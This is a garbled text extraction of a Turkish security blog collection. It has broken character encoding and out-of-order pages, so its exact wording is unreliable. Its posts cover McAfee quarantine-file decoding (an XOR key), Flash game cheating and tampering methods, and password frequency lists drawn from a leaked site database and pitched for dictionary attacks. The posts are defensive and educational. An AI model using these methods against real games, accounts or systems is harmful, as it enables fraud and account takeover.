bull Hack edilen 1250 devlet sitesinden 536 tanesi Linux 320 tanesi Windows 2003 333 tanesi Windows 2008 31 tanesi Windows2000 7 tanesi Unix işletim sistemi uumlzerinde barındırılıyormuş

Boumlyle vahim bir tablo karşısında devletin kendi kaynakları ile (Tuumlbitak) sitelerini iccedil ve dış tehditlere karşı acil olarak denetlemesigerekirken geccediltiğimiz ay Bankacılık Duumlzenleme ve Denetleme Kurumu (BDDK) 49 bankadan Tuumlbitaka 6 ay iccedilinde sızma testiyaptırmasını talep etti Bir yanda honeypot haline gelmiş devlet sitelerinin iccediller acısı hali diğer bir yanda guumlvenlik kontrollerinin ccedilok sıkıolduğu ve senede bir ccedilok defa iccedil ve dış guumlvenlik denetimlerinden geccedilen bankaların ilave olarak devlet kaynakları ile de denetlenmesiyorumu sizlere bırakıyorum

Bir sonraki yazıda goumlruumlşmek dileğiyle

Virusscan BUP Restore UtilitySource httpswwwmertsaricacomvirusscan-bup-restore-utilityBy MS on February 12th 2011

Bana goumlre korsanların (konumuz her zamanki gibi etik olanlar) başarılı olabilmeleri iccedilin yuumlksek hayal guumlcuumlne ve yaratıcı zekaya sahipolmaları gerekmektedir Karşılaştıkları engelleri aşmak ve başarıya ulaşmak iccedilin uumlretecekleri senaryolar hayal guumlccedilleri ile bu senaryolarıhayata geccedilirmeleri ise yaratıcılıkları ile muumlmkuumln olabilmektedir Nedense hayal guumlcuuml ile zafiyet keşfetme becerisini yaratıcılık ile iseprogramlama becerisini oumlrtuumlştuumlrmuumlşuumlmduumlr ve bu yuumlzden etik bir korsan olarak bu becerilerimi geliştirmek iccedilin zaman zaman senaryolaruumlreti zaman zamanda karşıma ccedilıkan fırsatları değerlendirmeye ccedilalışırım

Yine guumlnlerden bir guumln şuumlpheli bir duruma karşı kullanıcılardan gelen antivirus alarmlarına goumlz atarken kullanıcılardan gelen fazlasayıda alarm dikkatimi ccedilekti Zararlı yazılım analizinden oldukccedila keyif alan kahramanımız Mert fırsat bu fırsat Jedi duyuları ile hareketederek alarmların kaynağını aramaya koyuldu ve alarmların arkasında bu kullanıcıların ortak olarak ziyaret ettiği bir web sitesi olduğuanlaşıldı Web sitesini ziyaret eden kahramanımızın antivirus programı da aynı alarmı verince dosya uumlzerinde detaylı bir analiz yaptıktandurumun yanlış alarmdan (false positive) ibaret olduğunu anladı ve adli bilişim analizi yapma hevesi kursağında kaldı

Peki ya durum biraz daha farklı olsaydı Kahramanımızın kullandığı antivirus yazılımı Mcafee Virusscan olsaydı ve Virusscan tespitettiği zararlı yazılımları karantinaya alıyor olsaydı ayrıca kahramanımızın antivirus uumlzerindeki yetkileri (dosyayı karantinadan ccedilıkarmayetkisi) kısıtlı olsaydı bu durumda ne yapması gerekirdi

Antivirus sistemini youmlneten kişiden ilgili dosyayı restore etmesini ve analiz iccedilin kendisine iletmesini talep edebilir (e-posta ve telefontrafiği) veya sanal makine iccedilindeki işletim sistemine Virusscan kurabilir ve onun uumlzerinde restore edebilir (oumllme eşeğim oumllme) veyakarantina mekanizmasının nasıl ccedilalıştığını tersine muumlhendislik ile ccediloumlzerek bunu otomatize hale getiren bir araccedil hazırlayabilir (bildiğimkararıyla piyasada boumlyle bir araccedil yok veya ben aradığım zaman yoktu) ve yeri geldiğinde bunu adli bilişim analizlerinde kullanılabilirdi(hedef diskten karantinaya alınmış dosyaları kopyalamak ve incelemek size guumlzel ipuccedilları verebilir şayet analize elverişli biccedilimde disklesaklanmış ise)

Karantina işleminin nasıl yapıldığından kısaca bahsedece olursak Virusscan karantinaya aldığı dosyayı CQUARANTINE klasoumlruumlnefarklı bir ad altında kopyalamakta ve uzantı olarak BUP kullanmaktadır (Oumlrnek 7db11a1031283c50bup) Karantinaya alınanbir dosyayı herhangi bir hex editoumlruuml ile inceleyecek olursanız iccedileriğin ve dosya boyutunun orjinalinden farklı olduğunu anlamlıkarakterlerden oluşan diziler (string) ortadan kaybolmuş olduğunu goumlrebilirsiniz

33

Karantina mekanizmasının nasıl ccedilalıştığını hızlıca anlamaya ccedilalıştığımda karantinaya alınan ve BUP uzantısı ile saklanan dosyanın j(hex 6A) karakteri ile XOR işleminden geccedilirildiğini anlamam ccedilok zor olmadı

34

Hex Workshop ile karantinaya alınmış dosyayı 6A ile XOR işleminden geccedilirdikten sonra ortaya anlamlı karakterler oluşan dizilerccedilıkıverdi

35

Orjinal dosya ile XOR işleminden geccedilirilmiş dosyayı karşılaştırdığımda XORlanmış dosyanın ilk 2560 baytında detaylı bilgiler (orjinaldosyanın adı karantinaya alınma tarihi virusun adı vs) saklandığını goumlrduumlm Daha sonrasında ise programın orjinali saklanıyordu(Tam olarak orjinali diyemiyorum ccediluumlnkuuml her 65536 baytta bir 512 bayt buumlyuumlkluumlğuumlnde ccediloumlp veri araya (junk) sokuşturulmuş ve bunlarıayıklamam gerekti)

Hem detaylı bilgileri goumlsteren hem de karantinaya alınmış olan dosyayı orjinal haline ccedileviren bir program hazırlamak iccedilin işekoyulduğumda ortaya bup_recoverypy aracı ccedilıktı

36

Program iki komut (restore ve view) ile ccedilalışıyor ve kullanımı yine ccedilok basit İlk olarak yapmanız gereken karantinaya alınmış dosya ilebup_recoverypy programını aynı klasoumlre kopyalamanız Restore komutu ile hem detaylı bilgileri goumlrebilir hem de karantinaya alınmışprogramı orjinal haline ccedilevirebilirsiniz View komutu ile sadece detaylı bilgileri goumlrebilirsiniz

Oumlrnek bup_recoverypy restore 7db11a1031283c50bup

Programı buradan indirebilirsiniz

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi hafta sonları dilerim

Not Zaman zaman senaryolarımda Mcafee antivirus yazılımına yer veriyor olmamın nedeni uzun yıllarca kullanmış olmamdır başkabir nedeni yoktur )

Hackerlarrsquoın Goumlzuumlnden Flash UygulamalarıSource httpswwwmertsaricacomhackerlarin-gozunden-flash-uygulamalariBy MS on January 30th 2011

Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar iccedilin yapmış olduğum sunumu kısaca yazıya doumlkmeye karar verdim

Oumln bilgi olarak Flash kısaca web sayfalarına animasyon video ve etkileşim eklemek amacıyla kullanılan ve Actionscript adında nesneyoumlnelimli (object oriented) programlama dili iccedileren bir multimedya platformudur Flash uygulamalarına ccediloğunlukla reklamlarda veoyunlarda rastlarız Flash dosyaları ccediloğunlukla SWF (ShockWave Flash) formatında olur ve aslında bir sanal makine olan Flash oynatıcısıtarafından ccedilalıştırılır Flash oynatıcısının bir sanal makine olması sayesinde SWF formatındaki bu dosyalar her platformda ccedilalıştırılabilirDurum boumlyle olunca Javada da olduğu gibi SWF formatındaki bir dosya kolaylıkla baytkoddan (bytecode) kaynak koduna ccedilevrilebilir(decompile) Actionscript ilk olarak animasyonları kontrol etmek iccedilin tasarlanmıştır fakat geliştirilen yeni suumlruumlmleri ile web tabanlıoyunlardan goumlruumlntuuml ve ses yayını yapmaya imkan tanıyan zengin internet uygulamaları geliştirilebilmesine imkan tanımaktadır veJavascript ile aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 27: Hack 4 Career - 2011

27

Servisin bu şekilde isteyen herkes tarafından kullanılabiliyor olmasının art niyetli kişiler tarafından nasıl istismar edilebileceğiniduumlşuumlnmeye koyulduğumda aklıma gelen ilk senaryo şu şekilde oldu Bildiğiniz gibi man in the mobile saldırısı gerccedilekleştiren Zeusbankacılık trojanı kullanıcının cep telefonuna SMS şifresini ccedilalmak iccedilin bir trojan goumlndermektedir Boumlyle bir servisin halka accedilık olarakhizmet vermesi durumunda bu servisten faydalanan zararlı bir yazılım koumlruuml koumlruumlne kurbana ait olan cep telefonu numarasına SMSşifresini ccedilalan trojan goumlndermek yerine oumlncelikle bu servisi ccedilağırarak mobil imza kullanıcısı olup olmadığını teyit edebilir ve yanıtagoumlre mobil imza uygulamasını hedef alan zararlı bir yazılım goumlnderebilir Bu servisin bu şekli ile kullanılmasının bir gsm firmasınaait mobil imza kullanan banka muumlşterilerinin ve bankaların doğru bulmayacağını duumlşuumlnerek konuyu hemen X firmasına bildirmekiccedilin sayfalarında yer alan e-posta adresine bir e-posta goumlnderdim Bu adrese goumlnderilen e-postaları kontrol etmeyeceklerini duumlşuumlnerek(Tuumlrkiye gerccedileği) biraz araştırma yaparak genel muumlduumlruumln e-posta adresini bularak kendisine konu ile ilgili iletişim kurabileceğim biryetkilinin bilgisini oumlğrenmek iccedilin ayrı bir e-posta goumlnderdim Ancak iki hafta iccedilinde tarafıma herhangi bir geri doumlnuumlş yapılmadığı iccedilinbu servisin art niyetli kişiler tarafından bu şekilde kullanılmasını en kısa suumlrede engelleyebilmek adına bu yazıyı yazma ve ilgililerigoumlreve ccedilağırma misyonunu uumlstlendim

Yazının giriş kısmında da belirttiğim uumlzere web servislerin sadece uygulamalar arasında kullanılıyor olması ve son kullanıcı kullanımınakısıtlanıyor olması bu tuumlr tehditleri berteraf edilmesine yardımcı olacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle

[28-03-2011] Guumlncelleme Firma genel muumlduumlruumlnuumln buguumln itibariyle tarafımla iletişime geccedilmesi ve firma isimlerinin yazıda geccedilmesindenoumltuumlruuml duyduğu rahatsızlığı dile getirmesi uumlzerine yazıda geccedilen firma isimleri sansuumlrlenmiştir Gerekli goumlruumllmesi durumunda ilerleyenzamanlarda kendileri ile gerccedilekleştirilen yazışmalara yer verilebilir

Googlersquoa Bile GuumlvenmeSource httpswwwmertsaricacomgooglea-bile-guvenmeBy MS on March 7th 2011

Milliyetcomtr web sitesinde yer alan bir haberde dolandırıcıların Gelir İdaresi Başkanlığına (wwwgibgovtr) ait olan internetvergi dairesi sitesinin bir kopyasını oluşturdukları ve benzer bir alan adı altında (wwwgibgentr) site kurarak insanları dolandırmaya

28

ccedilalıştıkları ortaya ccedilıkmış İşin ilginccedil yanı ise bu sahte sitenin Google arama motorunda motorlu taşıtlar vergisi anahtar kelimesi ileyapılan aramalarda ilk sırada ccedilıkabilmesi iccedilin dolandırıcılar tarafından Googlea reklam verilmiş olması

Aslında yıllardan beri Google arama motoru uumlzerinde zararlı kod yayan sitelerden dolandırıcılık amacıyla kurulmuş olan sitelere kadarbir ccedilok zararlı sitenin kullanıcıları benzer youmlntemler ile hedef aldığı bilinmektedir Googleda bunlar karşısında boş durmayarak zararlıkod yayan siteleri tespit etmekte ve arama sonuccedillarına ilgili site iccedilin ufak bir ibare ekleyerek ziyaret edilmek istenen sitenin pek teguumlvenilir olmadığı konusunda kullancıları bilgilendirmektedir

